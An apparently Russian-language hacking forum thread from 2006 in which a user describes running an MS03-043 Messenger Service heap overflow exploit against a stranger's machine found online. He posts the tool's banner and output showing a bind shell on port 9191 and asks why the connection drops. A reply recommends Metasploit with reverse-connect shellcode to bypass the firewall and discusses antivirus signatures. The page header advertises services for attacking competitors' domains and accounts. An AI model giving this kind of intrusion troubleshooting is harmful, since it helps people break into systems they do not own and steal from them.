Sos! | ANTICHAT — форум по информационной безопасности и программированию

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Безопасность и Анонимность > Защита ОС: вирусы, антивирусы, файрволы.
Sos!

Опции темы

Поиск в этой теме

Опции просмотра

Sos!

27.08.2006, 03:17

GeyDee

Участник форума

Регистрация: 19.03.2006

Сообщений: 142

С нами: 10603816

Репутация: 177

Sos!

Привет всем онлайновским перцам! У меня небольшая проблемка, в которой я прошу помочь мне разобраться. Значит так! Нарыл я в инете одну дырявую тачку. Уязвимость Microsoft RPS (ms03-043).
на 135 порту. Залил сплойт. После этого мона было подконнектиться к порту 9191, но когда я начинал тельнетиться к этому порту, соединение сбрасывалось.

Вот небольшой листинг, так сказать, моего сплойта, которого я запаивал при его запуске.

C:\Windows\remote.exe

-=[MS Messenger Service Heap Overflow Exploit (ms03-43) ver 0.7]=-

by Adik <netmaniac [at] hotmail.kg>
http://netninja.to.kg

Target OS version:

[0] Windows 2000 SP 3 <en>
[1] Windows XP SP 1 <en>

Usage: remote.exe [TargetIP] [ver: 0 :1]
eg: msgr.exe 192.168.63.130 0

C:\Windows

А вот этот после соотвествующих действий:

C:\Windows\remote.exe

-=[ MS Messenger Service Heap Overflow Ex by Adik
<netmaniac [at] hotmail.KG >
http://netninja.to.kg

[*] Target: IP: 85.192.128.18
[*] UEF: 0x77ed73b4
[*] JMP: 0x7804bf52
[*] WSAStartup initialized...
[*] Msg body size: 3600
[*] Socket initialized...
[*] Injecting packet into a remote proces
[*] Packet injected...
[i] Try connecting to 85.192.128.18:9191

Помогите разобраться.

𝕏 Twitter Reddit Telegram Копировать ссылку

27.08.2006, 03:36

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

С нами: 10459106

Репутация: 2996

TELNET 85.192.128.18:9191
или юзай putty

27.08.2006, 12:01

GeyDee

Участник форума

Регистрация: 19.03.2006

Сообщений: 142

С нами: 10603816

Репутация: 177

Да в том то и дело! Когда начинаю тельнетиться, соединение сначала идет, а потом секунд ч-з 10 сбрасывается!

Telnet 85.192.128.18:9191
Connecting 85.192.128.18. . .
Не удается установить соединение с 85.192.128.18 на порт 9191. Сбой подключения.

HELP!
-------------------------------------------------------------------

Говори кратко, проси мало, уходи быстро и больше не вспоминай о чем попросил...

27.08.2006, 12:19

~~Elekt~~

Banned

Регистрация: 05.12.2005

Сообщений: 982

С нами: 10752806

Репутация: 1202

Ну вроде всё правильно, если эксплоит рабочий.

Можно попробовать заюзать аналогичный сплоит в метасплоите. Там точно был под виндовый месенджер. И в качестве шелкода использовать не бинд порта, а бэкконнект. Тогда поганый виндовый фаервол не будет помехой(хотя я уже не помню, был ли в 1 СП фаер. вроде был). Он скорее всего и мешает.

Но тут ещё вот в чём фича. Если у жертвы стоит Аутпост, или Касперский 5 и выше, то там есть в базах сигнатура этого сплоита. И уязвимость может существовать, но заюзать её могут помешать.

Так что, думаю не судьба. такое бывает.

27.08.2006, 15:19

GeyDee

Участник форума

Регистрация: 19.03.2006

Сообщений: 142

С нами: 10603816

Репутация: 177

Elekt
Пасиб конечно за развернутый ответ. Сплойт рабочий, по крайней мере сливал с разный паг два раза. Сплойт должен быть рабочий! Но я попробую ч-з бэконнект, посмотрю, что из этого выйдет.
Пробовал другие сплойты связанные с уязвимостью RPC на 135 порту, тоже такая же батва. Уже голову сломал.
Может еще что-нить подскажет?

29.08.2006, 23:01

GeyDee

Участник форума

Регистрация: 19.03.2006

Сообщений: 142

С нами: 10603816

Репутация: 177

Темку можно крыть. Все вопросы решены.

Предыдущая тема Следующая тема

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Sos! Открыл комп протереть пыль и обнаружил ужасные вещи!	PEPSICOLA	"Железо"	21	11.06.2006 11:54
Sos!	PEPSICOLA	PHP	4	23.03.2006 00:05

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход